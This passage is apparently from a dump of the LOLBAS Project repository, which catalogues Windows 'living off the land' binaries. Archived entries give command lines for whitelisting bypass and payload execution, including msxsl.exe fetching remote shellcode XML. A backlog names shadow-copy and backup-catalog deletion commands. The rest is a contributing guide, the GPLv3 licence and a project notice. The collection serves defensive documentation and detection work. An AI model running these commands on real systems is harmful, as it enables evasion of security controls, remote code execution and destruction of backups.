https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/ * Full path: * N/A * Notes: Thanks to Matt Nelson - @enigma0x3 ================================================ FILE: Archive-Old-Version/OtherMSBinaries/msxsl.exe.md ================================================ ## msxsl.exe * Functions: Execute ``` msxsl.exe customers.xml script.xsl Run COM Scriptlet code within the script.xsl file (local). msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml Run COM Scriptlet code within the shellcode.xml(xsl) file (remote). ``` * Resources: * https://twitter.com/subTee/status/877616321747271680 * https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker * Full path: * N/A * Notes: Thanks to Casey Smith - @subTee (Finding), 3gstudent - @3gstudent (Remote) ================================================ FILE: Archive-Old-Version/OtherMSBinaries/rcsi.exe.md ================================================ ## rcsi.exe * Functions: Execute ``` rcsi.exe bypass.csx Use embedded C# within the csx script to execute the code. ``` * Resources: * https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/ * Full path: * * Notes: Thanks to Matt Nelson - @enigma0x3 ================================================ FILE: Archive-Old-Version/OtherMSBinaries/te.exe.md ================================================ ## te.exe * Functions: Execute ``` te.exe bypass.wsc Run COM Scriptlets (e.g. VBScript) by calling a Windows Script Component (WSC) file. ``` * Resources: * https://twitter.com/gn3mes1s/status/927680266390384640?lang=bg * Full path: * * Notes: Thanks to Giuseppe N3mes1s - @gN3mes1s ================================================ FILE: Archive-Old-Version/OtherMSBinaries/vsjitdebugger.exe.md ================================================ ## vsjitdebugger.exe * Functions: Execute ``` Vsjitdebugger.exe calc.exe Executes calc.exe as a subprocess of Vsjitdebugger.exe. ``` * Resources: * https://twitter.com/pabraeken/status/990758590020452353 * Full path: * c:\windows\system32\vsjitdebugger.exe * Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken ================================================ FILE: Archive-Old-Version/OtherMSBinaries/winword.exe.md ================================================ ## winword.exe * Functions: Execute ``` winword.exe /l dllfile.dll Launch DLL payload. ``` * Resources: * https://twitter.com/vysecurity/status/884755482707210241 * https://twitter.com/Hexacorn/status/885258886428725250 * Full path: * c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE * Notes: Thanks to Vincent Yiu - @@vysecurity (Cmd), Adam - @Hexacorn (Internals) ================================================ FILE: Archive-Old-Version/OtherScripts/testxlst.js.md ================================================ ## testxlst.js * Functions: Execute ``` cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out Test Jscript included in Python tool to perform XSL transform (for payload execution). wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out Test Jscript included in Python tool to perform XSL transform (for payload execution). ``` * Resources: * https://twitter.com/bohops/status/993314069116485632 * Full path: * c:\python27amd64\Lib\site-packages\win32com\test\testxslt.js (Visual Studio Installation) * Notes: Thanks to Jimmy - @bohops ================================================ FILE: Backlog.txt ================================================ Ntsd.exe Debugger Kd.exe Debugger Certreq.exe Exfiltrate data Dbghost.exe Robocopy.exe Needs examples Vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet notepad.exe Gui - Download files using Open (A lot of other programs as well) LOLGuiBins? wbadmin.exe wbadmin delete catalog -quiet psexec.exe Remote execution of code java.exe -agentpath: or -agentlib: WinMail.exe DLL Sideloading odbcad32.exe GUI DLL Loading WseClientSvc.exe - https://blog.huntresslabs.com/abusing-trusted-applications-a719219220f dvdplay.exe http://www.hexacorn.com/blog/2018/03/15/beyond-good-ol-run-key-part-73/ http://www.hexacorn.com/blog/category/living-off-the-land/pass-thru-command-execution/ https://twitter.com/Hexacorn/status/993498264497541120 https://twitter.com/Hexacorn/status/994000792628719618 https://github.com/MoooKitty/Code-Execution ================================================ FILE: CONTRIBUTING.md ================================================ # Contributing First, thank you for contributing! When submitting new LOLs, please submit a `yml` sourcefile (`yml/`) as these are used to generate everything else. Next, review `README.md` and ensure that your LOL meets the criteria--interesting or unexpected functionality that would be useful to an attacker. There's nothing special about the format. Just base your entry off an existing one and modify as required. Please ensure that you do not add or remove any of the fields; all are required. There is a template that can be used located here if you do not want to copy one of the existing LOLs: https://github.com/LOLBAS-Project/LOLBAS/blob/master/YML-Template.yml It is also important to use these (https://github.com/LOLBAS-Project/LOLBAS/blob/master/CategoryList.md) categories, since they relate to the web portal and it is crucial to get them right for everything to work. Looking forward for your contributions. ================================================ FILE: CategoryList.md ================================================ CATEGORY LIST ADS AWL bypass Compile Conceal Copy Credentials Decode Download Dump Encode Execute Reconnaissance Tamper UAC bypass Upload ================================================ FILE: LICENSE ================================================ GNU GENERAL PUBLIC LICENSE Version 3, 29 June 2007 Copyright (C) 2007 Free Software Foundation, Inc. Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The GNU General Public License is a free, copyleft license for software and other kinds of works. The licenses for most software and other practical works are designed to take away your freedom to share and change the works. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change all versions of a program--to make sure it remains free software for all its users. We, the Free Software Foundation, use the GNU General Public License for most of our software; it applies also to any other work released this way by its authors. You can apply it to your programs, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for them if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs, and that you know you can do these things. To protect your rights, we need to prevent others from denying you these rights or asking you to surrender the rights. Therefore, you have certain responsibilities if you distribute copies of the software, or if you modify it: responsibilities to respect the freedom of others. For example, if you distribute copies of such a program, whether gratis or for a fee, you must pass on to the recipients the same freedoms that you received. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. Developers that use the GNU GPL protect your rights with two steps: (1) assert copyright on the software, and (2) offer you this License giving you legal permission to copy, distribute and/or modify it. For the developers' and authors' protection, the GPL clearly explains that there is no warranty for this free software. For both users' and authors' sake, the GPL requires that modified versions be marked as changed, so that their problems will not be attributed erroneously to authors of previous versions. Some devices are designed to deny users access to install or run modified versions of the software inside them, although the manufacturer can do so. This is fundamentally incompatible with the aim of protecting users' freedom to change the software. The systematic pattern of such abuse occurs in the area of products for individuals to use, which is precisely where it is most unacceptable. Therefore, we have designed this version of the GPL to prohibit the practice for those products. If such problems arise substantially in other domains, we stand ready to extend this provision to those domains in future versions of the GPL, as needed to protect the freedom of users. Finally, every program is threatened constantly by software patents. States should not allow patents to restrict development and use of software on general-purpose computers, but in those that do, we wish to avoid the special danger that patents applied to a free program could make it effectively proprietary. To prevent this, the GPL assures that patents cannot be used to render the program non-free. The precise terms and conditions for copying, distribution and modification follow. TERMS AND CONDITIONS 0. Definitions. "This License" refers to version 3 of the GNU General Public License. "Copyright" also means copyright-like laws that apply to other kinds of works, such as semiconductor masks. "The Program" refers to any copyrightable work licensed under this License. Each licensee is addressed as "you". "Licensees" and "recipients" may be individuals or organizations. To "modify" a work means to copy from or adapt all or part of the work in a fashion requiring copyright permission, other than the making of an exact copy. The resulting work is called a "modified version" of the earlier work or a work "based on" the earlier work. A "covered work" means either the unmodified Program or a work based on the Program. To "propagate" a work means to do anything with it that, without permission, would make you directly or secondarily liable for infringement under applicable copyright law, except executing it on a computer or modifying a private copy. Propagation includes copying, distribution (with or without modification), making available to the public, and in some countries other activities as well. To "convey" a work means any kind of propagation that enables other parties to make or receive copies. Mere interaction with a user through a computer network, with no transfer of a copy, is not conveying. An interactive user interface displays "Appropriate Legal Notices" to the extent that it includes a convenient and prominently visible feature that (1) displays an appropriate copyright notice, and (2) tells the user that there is no warranty for the work (except to the extent that warranties are provided), that licensees may convey the work under this License, and how to view a copy of this License. If the interface presents a list of user commands or options, such as a menu, a prominent item in the list meets this criterion. 1. Source Code. The "source code" for a work means the preferred form of the work for making modifications to it. "Object code" means any non-source form of a work. A "Standard Interface" means an interface that either is an official standard defined by a recognized standards body, or, in the case of interfaces specified for a particular programming language, one that is widely used among developers working in that language. The "System Libraries" of an executable work include anything, other than the work as a whole, that (a) is included in the normal form of packaging a Major Component, but which is not part of that Major Component, and (b) serves only to enable use of the work with that Major Component, or to implement a Standard Interface for which an implementation is available to the public in source code form. A "Major Component", in this context, means a major essential component (kernel, window system, and so on) of the specific operating system (if any) on which the executable work runs, or a compiler used to produce the work, or an object code interpreter used to run it. The "Corresponding Source" for a work in object code form means all the source code needed to generate, install, and (for an executable work) run the object code and to modify the work, including scripts to control those activities. However, it does not include the work's System Libraries, or general-purpose tools or generally available free programs which are used unmodified in performing those activities but which are not part of the work. For example, Corresponding Source includes interface definition files associated with source files for the work, and the source code for shared libraries and dynamically linked subprograms that the work is specifically designed to require, such as by intimate data communication or control flow between those subprograms and other parts of the work. The Corresponding Source need not include anything that users can regenerate automatically from other parts of the Corresponding Source. The Corresponding Source for a work in source code form is that same work. 2. Basic Permissions. All rights granted under this License are granted for the term of copyright on the Program, and are irrevocable provided the stated conditions are met. This License explicitly affirms your unlimited permission to run the unmodified Program. The output from running a covered work is covered by this License only if the output, given its content, constitutes a covered work. This License acknowledges your rights of fair use or other equivalent, as provided by copyright law. You may make, run and propagate covered works that you do not convey, without conditions so long as your license otherwise remains in force. You may convey covered works to others for the sole purpose of having them make modifications exclusively for you, or provide you with facilities for running those works, provided that you comply with the terms of this License in conveying all material for which you do not control copyright. Those thus making or running the covered works for you must do so exclusively on your behalf, under your direction and control, on terms that prohibit them from making any copies of your copyrighted material outside their relationship with you. Conveying under any other circumstances is permitted solely under the conditions stated below. Sublicensing is not allowed; section 10 makes it unnecessary. 3. Protecting Users' Legal Rights From Anti-Circumvention Law. No covered work shall be deemed part of an effective technological measure under any applicable law fulfilling obligations under article 11 of the WIPO copyright treaty adopted on 20 December 1996, or similar laws prohibiting or restricting circumvention of such measures. When you convey a covered work, you waive any legal power to forbid circumvention of technological measures to the extent such circumvention is effected by exercising rights under this License with respect to the covered work, and you disclaim any intention to limit operation or modification of the work as a means of enforcing, against the work's users, your or third parties' legal rights to forbid circumvention of technological measures. 4. Conveying Verbatim Copies. You may convey verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice; keep intact all notices stating that this License and any non-permissive terms added in accord with section 7 apply to the code; keep intact all notices of the absence of any warranty; and give all recipients a copy of this License along with the Program. You may charge any price or no price for each copy that you convey, and you may offer support or warranty protection for a fee. 5. Conveying Modified Source Versions. You may convey a work based on the Program, or the modifications to produce it from the Program, in the form of source code under the terms of section 4, provided that you also meet all of these conditions: a) The work must carry prominent notices stating that you modified it, and giving a relevant date. b) The work must carry prominent notices stating that it is released under this License and any conditions added under section 7. This requirement modifies the requirement in section 4 to "keep intact all notices". c) You must license the entire work, as a whole, under this License to anyone who comes into possession of a copy. This License will therefore apply, along with any applicable section 7 additional terms, to the whole of the work, and all its parts, regardless of how they are packaged. This License gives no permission to license the work in any other way, but it does not invalidate such permission if you have separately received it. d) If the work has interactive user interfaces, each must display Appropriate Legal Notices; however, if the Program has interactive interfaces that do not display Appropriate Legal Notices, your work need not make them do so. A compilation of a covered work with other separate and independent works, which are not by their nature extensions of the covered work, and which are not combined with it such as to form a larger program, in or on a volume of a storage or distribution medium, is called an "aggregate" if the compilation and its resulting copyright are not used to limit the access or legal rights of the compilation's users beyond what the individual works permit. Inclusion of a covered work in an aggregate does not cause this License to apply to the other parts of the aggregate. 6. Conveying Non-Source Forms. You may convey a covered work in object code form under the terms of sections 4 and 5, provided that you also convey the machine-readable Corresponding Source under the terms of this License, in one of these ways: a) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by the Corresponding Source fixed on a durable physical medium customarily used for software interchange. b) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by a written offer, valid for at least three years and valid for as long as you offer spare parts or customer support for that product model, to give anyone who possesses the object code either (1) a copy of the Corresponding Source for all the software in the product that is covered by this License, on a durable physical medium customarily used for software interchange, for a price no more than your reasonable cost of physically performing this conveying of source, or (2) access to copy the Corresponding Source from a network server at no charge. c) Convey individual copies of the object code with a copy of the written offer to provide the Corresponding Source. This alternative is allowed only occasionally and noncommercially, and only if you received the object code with such an offer, in accord with subsection 6b. d) Convey the object code by offering access from a designated place (gratis or for a charge), and offer equivalent access to the Corresponding Source in the same way through the same place at no further charge. You need not require recipients to copy the Corresponding Source along with the object code. If the place to copy the object code is a network server, the Corresponding Source may be on a different server (operated by you or a third party) that supports equivalent copying facilities, provided you maintain clear directions next to the object code saying where to find the Corresponding Source. Regardless of what server hosts the Corresponding Source, you remain obligated to ensure that it is available for as long as needed to satisfy these requirements. e) Convey the object code using peer-to-peer transmission, provided you inform other peers where the object code and Corresponding Source of the work are being offered to the general public at no charge under subsection 6d. A separable portion of the object code, whose source code is excluded from the Corresponding Source as a System Library, need not be included in conveying the object code work. A "User Product" is either (1) a "consumer product", which means any tangible personal property which is normally used for personal, family, or household purposes, or (2) anything designed or sold for incorporation into a dwelling. In determining whether a product is a consumer product, doubtful cases shall be resolved in favor of coverage. For a particular product received by a particular user, "normally used" refers to a typical or common use of that class of product, regardless of the status of the particular user or of the way in which the particular user actually uses, or expects or is expected to use, the product. A product is a consumer product regardless of whether the product has substantial commercial, industrial or non-consumer uses, unless such uses represent the only significant mode of use of the product. "Installation Information" for a User Product means any methods, procedures, authorization keys, or other information required to install and execute modified versions of a covered work in that User Product from a modified version of its Corresponding Source. The information must suffice to ensure that the continued functioning of the modified object code is in no case prevented or interfered with solely because modification has been made. If you convey an object code work under this section in, or with, or specifically for use in, a User Product, and the conveying occurs as part of a transaction in which the right of possession and use of the User Product is transferred to the recipient in perpetuity or for a fixed term (regardless of how the transaction is characterized), the Corresponding Source conveyed under this section must be accompanied by the Installation Information. But this requirement does not apply if neither you nor any third party retains the ability to install modified object code on the User Product (for example, the work has been installed in ROM). The requirement to provide Installation Information does not include a requirement to continue to provide support service, warranty, or updates for a work that has been modified or installed by the recipient, or for the User Product in which it has been modified or installed. Access to a network may be denied when the modification itself materially and adversely affects the operation of the network or violates the rules and protocols for communication across the network. Corresponding Source conveyed, and Installation Information provided, in accord with this section must be in a format that is publicly documented (and with an implementation available to the public in source code form), and must require no special password or key for unpacking, reading or copying. 7. Additional Terms. "Additional permissions" are terms that supplement the terms of this License by making exceptions from one or more of its conditions. Additional permissions that are applicable to the entire Program shall be treated as though they were included in this License, to the extent that they are valid under applicable law. If additional permissions apply only to part of the Program, that part may be used separately under those permissions, but the entire Program remains governed by this License without regard to the additional permissions. When you convey a copy of a covered work, you may at your option remove any additional permissions from that copy, or from any part of it. (Additional permissions may be written to require their own removal in certain cases when you modify the work.) You may place additional permissions on material, added by you to a covered work, for which you have or can give appropriate copyright permission. Notwithstanding any other provision of this License, for material you add to a covered work, you may (if authorized by the copyright holders of that material) supplement the terms of this License with terms: a) Disclaiming warranty or limiting liability differently from the terms of sections 15 and 16 of this License; or b) Requiring preservation of specified reasonable legal notices or author attributions in that material or in the Appropriate Legal Notices displayed by works containing it; or c) Prohibiting misrepresentation of the origin of that material, or requiring that modified versions of such material be marked in reasonable ways as different from the original version; or d) Limiting the use for publicity purposes of names of licensors or authors of the material; or e) Declining to grant rights under trademark law for use of some trade names, trademarks, or service marks; or f) Requiring indemnification of licensors and authors of that material by anyone who conveys the material (or modified versions of it) with contractual assumptions of liability to the recipient, for any liability that these contractual assumptions directly impose on those licensors and authors. All other non-permissive additional terms are considered "further restrictions" within the meaning of section 10. If the Program as you received it, or any part of it, contains a notice stating that it is governed by this License along with a term that is a further restriction, you may remove that term. If a license document contains a further restriction but permits relicensing or conveying under this License, you may add to a covered work material governed by the terms of that license document, provided that the further restriction does not survive such relicensing or conveying. If you add terms to a covered work in accord with this section, you must place, in the relevant source files, a statement of the additional terms that apply to those files, or a notice indicating where to find the applicable terms. Additional terms, permissive or non-permissive, may be stated in the form of a separately written license, or stated as exceptions; the above requirements apply either way. 8. Termination. You may not propagate or modify a covered work except as expressly provided under this License. Any attempt otherwise to propagate or modify it is void, and will automatically terminate your rights under this License (including any patent licenses granted under the third paragraph of section 11). However, if you cease all violation of this License, then your license from a particular copyright holder is reinstated (a) provisionally, unless and until the copyright holder explicitly and finally terminates your license, and (b) permanently, if the copyright holder fails to notify you of the violation by some reasonable means prior to 60 days after the cessation. Moreover, your license from a particular copyright holder is reinstated permanently if the copyright holder notifies you of the violation by some reasonable means, this is the first time you have received notice of violation of this License (for any work) from that copyright holder, and you cure the violation prior to 30 days after your receipt of the notice. Termination of your rights under this section does not terminate the licenses of parties who have received copies or rights from you under this License. If your rights have been terminated and not permanently reinstated, you do not qualify to receive new licenses for the same material under section 10. 9. Acceptance Not Required for Having Copies. You are not required to accept this License in order to receive or run a copy of the Program. Ancillary propagation of a covered work occurring solely as a consequence of using peer-to-peer transmission to receive a copy likewise does not require acceptance. However, nothing other than this License grants you permission to propagate or modify any covered work. These actions infringe copyright if you do not accept this License. Therefore, by modifying or propagating a covered work, you indicate your acceptance of this License to do so. 10. Automatic Licensing of Downstream Recipients. Each time you convey a covered work, the recipient automatically receives a license from the original licensors, to run, modify and propagate that work, subject to this License. You are not responsible for enforcing compliance by third parties with this License. An "entity transaction" is a transaction transferring control of an organization, or substantially all assets of one, or subdividing an organization, or merging organizations. If propagation of a covered work results from an entity transaction, each party to that transaction who receives a copy of the work also receives whatever licenses to the work the party's predecessor in interest had or could give under the previous paragraph, plus a right to possession of the Corresponding Source of the work from the predecessor in interest, if the predecessor has it or can get it with reasonable efforts. You may not impose any further restrictions on the exercise of the rights granted or affirmed under this License. For example, you may not impose a license fee, royalty, or other charge for exercise of rights granted under this License, and you may not initiate litigation (including a cross-claim or counterclaim in a lawsuit) alleging that any patent claim is infringed by making, using, selling, offering for sale, or importing the Program or any portion of it. 11. Patents. A "contributor" is a copyright holder who authorizes use under this License of the Program or a work on which the Program is based. The work thus licensed is called the contributor's "contributor version". A contributor's "essential patent claims" are all patent claims owned or controlled by the contributor, whether already acquired or hereafter acquired, that would be infringed by some manner, permitted by this License, of making, using, or selling its contributor version, but do not include claims that would be infringed only as a consequence of further modification of the contributor version. For purposes of this definition, "control" includes the right to grant patent sublicenses in a manner consistent with the requirements of this License. Each contributor grants you a non-exclusive, worldwide, royalty-free patent license under the contributor's essential patent claims, to make, use, sell, offer for sale, import and otherwise run, modify and propagate the contents of its contributor version. In the following three paragraphs, a "patent license" is any express agreement or commitment, however denominated, not to enforce a patent (such as an express permission to practice a patent or covenant not to sue for patent infringement). To "grant" such a patent license to a party means to make such an agreement or commitment not to enforce a patent against the party. If you convey a covered work, knowingly relying on a patent license, and the Corresponding Source of the work is not available for anyone to copy, free of charge and under the terms of this License, through a publicly available network server or other readily accessible means, then you must either (1) cause the Corresponding Source to be so available, or (2) arrange to deprive yourself of the benefit of the patent license for this particular work, or (3) arrange, in a manner consistent with the requirements of this License, to extend the patent license to downstream recipients. "Knowingly relying" means you have actual knowledge that, but for the patent license, your conveying the covered work in a country, or your recipient's use of the covered work in a country, would infringe one or more identifiable patents in that country that you have reason to believe are valid. If, pursuant to or in connection with a single transaction or arrangement, you convey, or propagate by procuring conveyance of, a covered work, and grant a patent license to some of the parties receiving the covered work authorizing them to use, propagate, modify or convey a specific copy of the covered work, then the patent license you grant is automatically extended to all recipients of the covered work and works based on it. A patent license is "discriminatory" if it does not include within the scope of its coverage, prohibits the exercise of, or is conditioned on the non-exercise of one or more of the rights that are specifically granted under this License. You may not convey a covered work if you are a party to an arrangement with a third party that is in the business of distributing software, under which you make payment to the third party based on the extent of your activity of conveying the work, and under which the third party grants, to any of the parties who would receive the covered work from you, a discriminatory patent license (a) in connection with copies of the covered work conveyed by you (or copies made from those copies), or (b) primarily for and in connection with specific products or compilations that contain the covered work, unless you entered into that arrangement, or that patent license was granted, prior to 28 March 2007. Nothing in this License shall be construed as excluding or limiting any implied license or other defenses to infringement that may otherwise be available to you under applicable patent law. 12. No Surrender of Others' Freedom. If conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot convey a covered work so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not convey it at all. For example, if you agree to terms that obligate you to collect a royalty for further conveying from those to whom you convey the Program, the only way you could satisfy both those terms and this License would be to refrain entirely from conveying the Program. 13. Use with the GNU Affero General Public License. Notwithstanding any other provision of this License, you have permission to link or combine any covered work with a work licensed under version 3 of the GNU Affero General Public License into a single combined work, and to convey the resulting work. The terms of this License will continue to apply to the part which is the covered work, but the special requirements of the GNU Affero General Public License, section 13, concerning interaction through a network will apply to the combination as such. 14. Revised Versions of this License. The Free Software Foundation may publish revised and/or new versions of the GNU General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies that a certain numbered version of the GNU General Public License "or any later version" applies to it, you have the option of following the terms and conditions either of that numbered version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of the GNU General Public License, you may choose any version ever published by the Free Software Foundation. If the Program specifies that a proxy can decide which future versions of the GNU General Public License can be used, that proxy's public statement of acceptance of a version permanently authorizes you to choose that version for the Program. Later license versions may give you additional or different permissions. However, no additional obligations are imposed on any author or copyright holder as a result of your choosing to follow a later version. 15. Disclaimer of Warranty. THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 16. Limitation of Liability. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. 17. Interpretation of Sections 15 and 16. If the disclaimer of warranty and limitation of liability provided above cannot be given local legal effect according to their terms, reviewing courts shall apply local law that most closely approximates an absolute waiver of all civil liability in connection with the Program, unless a warranty or assumption of liability accompanies a copy of the Program in return for a fee. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively state the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. Copyright (C) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . Also add information on how to contact you by electronic and paper mail. If the program does terminal interaction, make it output a short notice like this when it starts in an interactive mode: Copyright (C) This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details. The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, your program's commands might be different; for a GUI interface, you would use an "about box". You should also get your employer (if you work as a programmer) or school, if any, to sign a "copyright disclaimer" for the program, if necessary. For more information on this, and how to apply and follow the GNU GPL, see . The GNU General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Lesser General Public License instead of this License. But first, please read . ================================================ FILE: NOTICE.md ================================================ ## Purpose * The LOLBAS Project is a community-driven open-source resource for documenting "Living-Off-The-Land" commands and techniques that are associated with common "Living-Off-The-Land" binaries (lolbins), scripts, and libraries within Microsoft(R) Windows(R) and associated software products. This notice serves as the primary document for terms, disclaimer, usage, structure, and license acknowledgements. * Please refer to the README.md for "Living-Off-The-Land" criteria and definition. * "LOLBAS Project" and "LOLBAS" are used interchangeably in this document and refer to the "LOLBAS Project" ## Project License * The LOLBAS Project is licensed under GPL 3.0. For license information, please refer to the [LICENSE file](/LICENSE). ## Definitions * Submitter: An individual, group, organization, or entity that contributes to the LOLBAS project through project maintenance, issue submission, Pull Request (PR) submission, etc. * Consumer: An individual, group, organization, or entity that uses ("consumes") the LOLBAS project resources through the web portal or repository interfaces and capabilities. * LOLBAS: Living Off The Land Binaries and Scripts * LOLBIN: Living Off The Land Binary * LOL/"lol": Living Off The Land ## Project Terms of Use & Disclaimers * The content presented in the LOLBAS Project, an open-source project, is for educational and informational purposes only. By using this project, including information presented on all project pages and resources in the project repository, you agree that the project authors and maintainers shall not be liable and/or held responsible/accountable for any damages resulting from the presentation, use, or misuse of the information contained on any project pages and repository documents. * The LOLBAS Project does NOT claim that detection resources/information provided on any project pages and repository documents offer complete and proper defensive/analytic coverage for documented and undocumented LOLBIN commands, techniques, and/or use cases. * The LOLBAS project is a consumable resource for commercial entities, private entities, and individuals. LOLBAS includes and references resources from open and public sources to enhance content quality, however, the LOLBAS Project does not endorse any particular entity, vendor, project, group, or individual. Furthermore, use of the LOLBAS project or any LOLBAS site/repository content by commercial entities, private entities, and individuals does not imply endorsement. * LOLBAS references and links to many external/3rd party resources. Linked sites and references are not under the control of the LOLBAS Project, and as such, the LOLBAS Project is not responsible for content of external/3rd party resource sites. Furthermore, linking of external/3rd party resources does not imply endorsement of those who manage or maintain those resources. ## Project Usage * For consuming content on the LOLBAS Project, please refer to the content on this page, navigate to resources under [/yml](/yml), and/or visit: https://lolbas-project.github.io. * For making a contribution to the LOLBAS Project, please refer to this notice, [README.md](/README.md), and [CONTRIBUTING.md](/CONTRIBUTING.md). ## LOLBAS Entry Structure & Information * `Name` Field: The name of the LOL binary, script, or library resource. * `Description` Field: A short sentence of the legitimate functionality of the 'lol' resource. * `Author` Field: The submitter of the 'lol' resource. * `Created` Field: The date when the 'lol' resource is submitted or this entry is created. * `Commands` Field: Contains subfields to describe usage of the 'lol' resource. Includes: * `Command` (the command or sequence of commands/details needed to perform the 'lol' effect); * `Description` (details of the 'lol' command behavior); * `Usecase` (details of the use case such as the purpose and technique; * `Category` (LOLBAS categories include AWL Bypass - Application Control Bypass; Execution; Defense Evasion; Download, Upload, Copy, Encode, Decode, Compile, ADS - Alternate Data Stream, UAC Bypass - User Account Control Bypass, Credentials - Harvest/Dump Credentials, Reconnaissance, Tamper); * `Privilege` (User or Administrator level privileges required); * `MitreId`[^1] (MITRE (R) ATT&CK(R) Tactic/Technique mapping); * `OperatingSystem` (version such as Windows 10). * `FullPath` Field: Includes the `Path` subfield to record commonly located file system paths of the 'lol' resource. * `Code Sample` Field: Includes the `Code` subfield to specify a link to a code snippet (if applicable). * `Detection` Field: Contains subfields to describe potential detection criteria of the 'lol' resource. Includes: * `Sigma`[^2] (a link to Sigma detection rule on Sigma's git repository); * `Splunk`[^2] (a link to Splunk detection rule on Splunk's git repository); * `Elastic`[^2] (a link to Elastic detection rule on Elastic's git repository); * `IOC`[^3] (to provide information about indicators of compromise); * `Analysis`[^4] (a placeholder for linked resources - e.g. blog, gist, write-up, Twitter post, etc.). * `Resources` Field[^5]: The `Link` subfield is a placeholder for a referenced resource link about the 'lol' resource. * `Acknowledgements` Field: Includes the following subfields: * `Person` (identifies the individual who originally discovered the technique/command); * `Handle` (the person's Twitter handle if applicable). [^1]: Note on MITRE(R) ATT&CK(R) Reference Model: Since the ATT&CK(R) model is widely adopted, LOLBAS attempts map to the appropriate technique if applicable. The applicable ATT&CK(R) license appears in the 'Licenses' section. [^2]: Note on Detection References: LOLBAS does not guarantee that a particular detection reference included by a submitter/maintainer will detect associated LOLBIN behavior. The reference is simply an acknowledgment that a resource exists, and the resource could potentially be useful for a consumer. Furthermore, LOLBAS does not endorse any referenced project over another, but rather, appreciates the efforts made by individuals and organizations for providing publicly available resources/projects. Consumers of such projects are encouraged to understand a referenced project's Terms of Use and abide by the project's licensing criteria if applicable. [^3]: Note on Detection IOCs: LOLBAS does not guarantee that a particular detection IOC included by a submitter/maintainer will detect associated LOLBIN behavior. [^4]: Note on Detection Analysis Links: A linked analysis resource under the Detection Field (e.g. blog, gist, write-up, etc.) and contents provided by a submitter/maintainer are not endorsed by the LOLBAS project. However, LOLBAS does appreciate the efforts made by individuals and organizations for providing publicly available resources. Consumers of the 'Analysis' resource are encouraged to understand the respective resource's Terms of Use and abide by the resource's licensing criteria if applicable. [^5]: Note on Resource Links: A linked resource under the Resources Field (e.g. blog, gist, write-up, Twitter post, etc.) and contents provided by submitters/maintainers are not endorsed by the LOLBAS project. However, LOLBAS does appreciate the efforts made by individuals and organizations for providing publicly available resources. Consumers of the linked resource are encouraged to understand the respective resource's Terms of Use and abide by the resource's licensing criteria if applicable. ## MITRE ATT&CK License * MITRE ATT&CK Terms of Use Link: https://attack.mitre.org/resources/terms-of-use/ LICENSE The MITRE Corporation 